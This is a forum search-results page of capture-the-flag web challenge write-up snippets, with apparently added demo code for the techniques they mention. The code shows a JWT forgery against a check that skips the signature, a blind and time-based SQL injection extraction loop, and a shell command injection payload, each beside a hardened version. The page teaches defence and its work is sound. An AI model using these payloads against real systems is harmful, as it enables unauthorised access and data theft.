Search results

  1. 0x90

    [/MNT/AIN LIB] [WEB] cyberpunk-weather-app

    cyberpunk-weather-app SRC: https://library.m0unt41n.ch/challenges/cyberpunk-weather-app This challenge displays weather data and uses a templating engine. During building of a string a command injection vuln was created within the else block... we can inject python code and therefore obtained...
  2. 0x90

    [/MNT/AIN LIB] [WEB] dotcom

    dotcom SRC: https://library.m0unt41n.ch/challenges/dotcom Solved this chall locally, submitted publicly shared flag. (hope that's fine) Reported chall as broken and fixed it. There is a .NET server and a BOT component, we need to make the bot write the flag into a textArea and somehow exfil...
  3. 0x90

    [/MNT/AIN LIB] [WEB] sleepy-sql

    sleepy-sql SRC: https://library.m0unt41n.ch/challenges/sleepy-sql In this challenge it is pretty obvious that we have to perform SQL injection, the hard part is exfiltration though, there is no reflection allowing us to read any data (like the flag). So we have to work with what we got, time. We can...
  4. 0x90

    [/MNT/AIN LIB] [WEB] legal-complaint-form

    legal-complaint-form SRC: https://library.m0unt41n.ch/challenges/legal-complaint-form Okay first of all, I consider myself a PHP pro, but damn I h8 apache... my main stack is using nginx as webserver... This chall requires two main steps. 1. First of all there is a malicious file upload vuln...
  5. 0x90

    [/MNT/AIN LIB] [WEB] pollpals

    pollpals SRC: https://library.m0unt41n.ch/challenges/pollpals Typical JWT misconfiguration or let's call it completely fucked up flow/logic/implementation. The isAdmin function in auth.js has no signature check for the JWT, it just accepts any JWT and extracts its info... const parts =...
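    The flaw described in this snippet, an admin check that splits the token and trusts the decoded payload without ever recomputing the signature, as an added example (not the challenge's auth.js and not the author's code). The HS256 secret, the `isAdmin` claim name and the minting helper are assumptions for the demo; the point is the difference between the vulnerable check and the hardened one:

```python
import base64
import hashlib
import hmac
import json

# Constructed demo secret; the challenge's real signing key is not on the page.
SERVER_SECRET = b"example-signing-key"


def _b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def _b64url_decode(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def sign_jwt(payload: dict, secret: bytes) -> str:
    """Mint an HS256 JWT the way a server normally would (assumed format)."""
    header = _b64url(json.dumps({"alg": "HS256", "typ": "JWT"}).encode())
    body = _b64url(json.dumps(payload).encode())
    sig = hmac.new(secret, f"{header}.{body}".encode(), hashlib.sha256).digest()
    return f"{header}.{body}.{_b64url(sig)}"


def is_admin_vulnerable(token: str) -> bool:
    """Mirrors the flaw: split on '.', decode the payload, trust whatever it
    says. The third part (the signature) is never looked at."""
    parts = token.split(".")
    payload = json.loads(_b64url_decode(parts[1]))
    return bool(payload.get("isAdmin"))


def is_admin_fixed(token: str, secret: bytes) -> bool:
    """Hardened check: pin the algorithm, recompute the HMAC over
    header.payload and compare in constant time before reading any claim."""
    try:
        header_b64, body_b64, sig_b64 = token.split(".")
    except ValueError:
        return False
    header = json.loads(_b64url_decode(header_b64))
    if header.get("alg") != "HS256":  # refuse alg=none and algorithm confusion
        return False
    expected = hmac.new(secret, f"{header_b64}.{body_b64}".encode(),
                        hashlib.sha256).digest()
    if not hmac.compare_digest(expected, _b64url_decode(sig_b64)):
        return False
    payload = json.loads(_b64url_decode(body_b64))
    return bool(payload.get("isAdmin"))


def forge_admin_token(legit_token: str) -> str:
    """What an attacker does against the vulnerable check: keep the header,
    rewrite the payload, leave a garbage signature nobody verifies."""
    header_b64, _, _ = legit_token.split(".")
    body = _b64url(json.dumps({"user": "attacker", "isAdmin": True}).encode())
    return f"{header_b64}.{body}.AAAA"
```

`forge_admin_token` passes `is_admin_vulnerable` and fails `is_admin_fixed`; a genuinely signed admin token passes both.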
  6. 0x90

    [/MNT/AIN LIB] [WEB] time-share

    time-share SRC: https://library.m0unt41n.ch/challenges/time-share Pretty easy beginner challenge which teaches an important lesson... ^^ The code has a logic flaw... it doesn't check if the user/admin_token is an actual admin token.. within the JWT there is no indication is_admin or anything...
  7. 0x90

    [/MNT/AIN LIB] [WEB] knowledge-archive

    knowledge-archive SRC: https://library.m0unt41n.ch/challenges/knowledge-archive Holy, this one is easy but took some time. I first was a lil sussed out about the AI Readable Data stuff (an HMAC using the flag as key) and all the file read/writes or even the popen & glob usage... but this was all a red...
  8. 0x90

    [/MNT/AIN LIB] [WEB] labyrinth

    labyrinth SRC: https://library.m0unt41n.ch/challenges/labyrinth This is quite the easy challenge, with multiple solutions... the most interesting exploitation path is bypassing the admin permission check to abuse the SQL injection within admin_search. So there's 3 interesting functions...
  9. 0x90

    [/MNT/AIN LIB] [WEB] centralized-identity

    centralized-identity SRC: https://library.m0unt41n.ch/challenges/centralized-identity This challenge consists of multiple steps, our main goal is to obtain the flag via the backend service API. 1. Within our IDP entrypoint.sh we can find credentials to log in to our frontend. email...
  10. 0x90

    [/MNT/AIN LIB] [WEB] blahajs

    blahajs SRC: https://library.m0unt41n.ch/challenges/blahajs The only real discoverable functionality in this challenge is the image display via a GET parameter name and endpoint /image. The rest of the challenge is just displaying of said images and it's sourceless. Soo I first tried a directory...
  11. 0x90

    [/MNT/AIN LIB] [WEB] airsmeller

    airsmeller SRC: https://library.m0unt41n.ch/challenges/air-smeller This challenge had a bot component and a leave-a-review component. It was quite clear the goal was to achieve XSS, but the inputs were sanitized using DOMPurify v19.0.0. At first glance I spent a ton of time looking for other...
  12. 0x90

    [/MNT/AIN LIB] [WEB] flagkeeper

    flagkeeper SRC: https://library.m0unt41n.ch/challenges/flagkeeper This challenge required us to access the admin's flag in the database. It had a fully fledged API worked out, and the main way to obtain the flag would be to use the admin's API token to request /api/flag for the flag. So I skimmed...
  13. 0x90

    [/MNT/AIN LIB] [WEB] sentry-as-navigation

    sentry-as-navigation SRC: https://library.m0unt41n.ch/challenges/sentry-as-navigation This challenge provides a tool to fetch and display certificate information. There is a clear and easy to find vulnerability in the code which allows RCE. for entry in san_entries: match =...
  14. 0x90

    [/MNT/AIN LIB] [WEB] lost-pass

    lost-pass SRC: https://library.m0unt41n.ch/challenges/lost-pass This challenge requires us to auth as admin, to obtain the flag within the dashboard page. After skimming the code we can see JWT session tokens, a registration function not visible in the frontend, and so on. This misled me to...
  15. 0x90

    [/MNT/AIN LIB] [WEB] i (unintended solution)

    i SRC: https://library.m0unt41n.ch/challenges/i In this challenge we are very obviously able to inject code into a style tag of the page. Our goal is to obtain an admin session/username to make the server display the flag. The challenge includes a bot, which we can control (make him visit...
  16. 0x90

    [/MNT/AIN LIB] [WEB] office-press

    office-press SRC: https://library.m0unt41n.ch/challenges/office-press Basically just a normal WordPress installation with a vulnerable plugin installed. Google: CVE-2023-6553 Exploit Find -> https://github.com/Chocapikk/CVE-2023-6553 When working with wp, WPScan is a great tool, get an api key...
  17. 0x90

    [/MNT/AIN LIB] [WEB] mr-template-man

    mr-template-man SRC: https://library.m0unt41n.ch/challenges/mr-template-man XSS injection and RCE via insecure template functionality. OS is wrapped and provided within our templating, which combined with the content XSS results in fully abusable RCE. @app.route("/", methods=["GET"]) def...
  18. 0x90

    [/MNT/AIN LIB] [WEB] lottery

    lottery SRC: https://library.m0unt41n.ch/challenges/lottery Blind SQL injection @app.route("/", methods=["GET", "POST"]) def index(): has_guessed = False answer_correct = False if request.method == "POST": has_guessed = True guess = request.form.get("guess", "")...
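    Both the lottery snippet (a string-built query whose only visible output is the answer_correct boolean) and the sleepy-sql snippet further up (nothing reflected at all, so only response time leaks) come down to the same extraction loop with a different oracle. The following is an added example, not code from either challenge or from the author: it stands up a constructed in-memory SQLite database with a hypothetical secret, registers a `sleep()` function because SQLite has no native one, and binary-searches each character's code point through a boolean oracle and through a timing oracle. Table and column names are assumptions for the demo.

```python
import sqlite3
import time

# Constructed stand-in for the challenge database; the secret is hypothetical.
SECRET = "flag{t1m3}"
DELAY = 0.05  # seconds the injected sleep() adds; the timing threshold is half of it


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    # SQLite has no SLEEP(); register one so the time-based variant can run offline.
    conn.create_function("sleep", 1, lambda s: time.sleep(s) or 0)
    conn.execute("CREATE TABLE tickets (number TEXT)")
    conn.execute("INSERT INTO tickets VALUES ('1234')")
    conn.execute("CREATE TABLE flags (value TEXT)")
    conn.execute("INSERT INTO flags VALUES (?)", (SECRET,))
    return conn


def vulnerable_guess(conn: sqlite3.Connection, guess: str) -> bool:
    """Lottery-style handler: the guess is concatenated into the query and the
    only thing the caller learns is whether a row matched (answer_correct)."""
    row = conn.execute(f"SELECT 1 FROM tickets WHERE number = '{guess}'").fetchone()
    return row is not None


def boolean_oracle(conn: sqlite3.Connection, pos: int, mid: int) -> bool:
    """True iff unicode(secret[pos]) > mid, read straight from answer_correct."""
    payload = f"' OR (SELECT unicode(substr(value,{pos},1)) FROM flags) > {mid} -- "
    return vulnerable_guess(conn, payload)


def time_oracle(conn: sqlite3.Connection, pos: int, mid: int) -> bool:
    """Same question when nothing is reflected: make the true branch sleep and
    measure. The subquery yields 0 either way, so the page content never changes."""
    payload = (f"' OR (SELECT CASE WHEN unicode(substr(value,{pos},1)) > {mid} "
               f"THEN sleep({DELAY}) ELSE 0 END FROM flags) -- ")
    start = time.monotonic()
    vulnerable_guess(conn, payload)
    return time.monotonic() - start > DELAY / 2


def extract(oracle, conn: sqlite3.Connection) -> str:
    """Binary-search each character's code point (7 queries per character).
    Past the end substr() returns '' and unicode('') is NULL, so every
    comparison is false, the search lands on 0 and we stop."""
    out = []
    pos = 1
    while True:
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(conn, pos, mid):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:
            return "".join(out)
        out.append(chr(lo))
        pos += 1
```

Against a real target the oracle functions would issue HTTP requests instead of calling `vulnerable_guess`; the timing variant should use a delay well above network jitter and repeat ambiguous measurements rather than trusting a single sample.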
  19. 0x90

    [/MNT/AIN LIB] [WEB] pawnedhaveibeen

    pawnedhaveibeen SRC: https://library.m0unt41n.ch/challenges/pawnedhaveibeen Source is given, the post form has a command injection through subprocess in py. @app.route('/check', methods=['POST']) def check_pawn(): username_or_email = request.form['username_or_email'] mysql_username =...
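    The injection class named in this snippet, user input reaching subprocess through a shell command line, beside the fix, as an added example that is not the challenge's check_pawn handler or the author's code. The grep-over-a-breach-file lookup, the constructed breach lines and the payload are assumptions for the demo; the page only says the form value reaches subprocess.

```python
import os
import subprocess
import tempfile

# Constructed breach list standing in for whatever the challenge greps through.
BREACHES = "alice@example.com:Adobe2013\nbob@example.com:LinkedIn2012\n"


def check_pawn_vulnerable(path: str, username_or_email: str) -> str:
    """Shape of the flaw: the form value is pasted into a shell string, so
    quotes, ';', '|' and $(...) in it are interpreted by /bin/sh."""
    cmd = f"grep -i '{username_or_email}' {path}"
    proc = subprocess.run(cmd, shell=True, capture_output=True, text=True,
                          stdin=subprocess.DEVNULL)
    return proc.stdout


def check_pawn_fixed(path: str, username_or_email: str) -> str:
    """Hardened version: argv list (no shell), -F so the value is a literal
    string, and '--' so it can never be parsed as a grep option like -r or -f."""
    proc = subprocess.run(
        ["grep", "-i", "-F", "--", username_or_email, path],
        capture_output=True, text=True, check=False, stdin=subprocess.DEVNULL,
    )
    return proc.stdout  # exit status 1 (no match) is a normal outcome here


def run_demo() -> dict:
    """Run both handlers on a legitimate lookup and on an injection payload
    that closes the quote, drops a harmless file argument and appends a
    command; returns the observed outputs."""
    fd, path = tempfile.mkstemp(suffix=".txt")
    with os.fdopen(fd, "w") as f:
        f.write(BREACHES)
    payload = "x' /dev/null; echo INJECTED; #"
    try:
        return {
            "legit_fixed": check_pawn_fixed(path, "alice"),
            "legit_vuln": check_pawn_vulnerable(path, "alice"),
            "payload_vuln": check_pawn_vulnerable(path, payload),
            "payload_fixed": check_pawn_fixed(path, payload),
        }
    finally:
        os.remove(path)
```

With the vulnerable handler the shell sees `grep -i 'x' /dev/null; echo INJECTED; #' ...` and runs the appended command; the fixed handler hands the whole payload to grep as one literal argument and simply finds nothing. This assumes a POSIX `grep` on the host.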
  20. 0x90

    [/MNT/AIN LIB] [WEB] calculator

    Calculator SRC: /mnt/ain lib -> https://library.m0unt41n.ch/challenges/calculator Pretty much just a python shell, due to it evalling user input without any sanitization...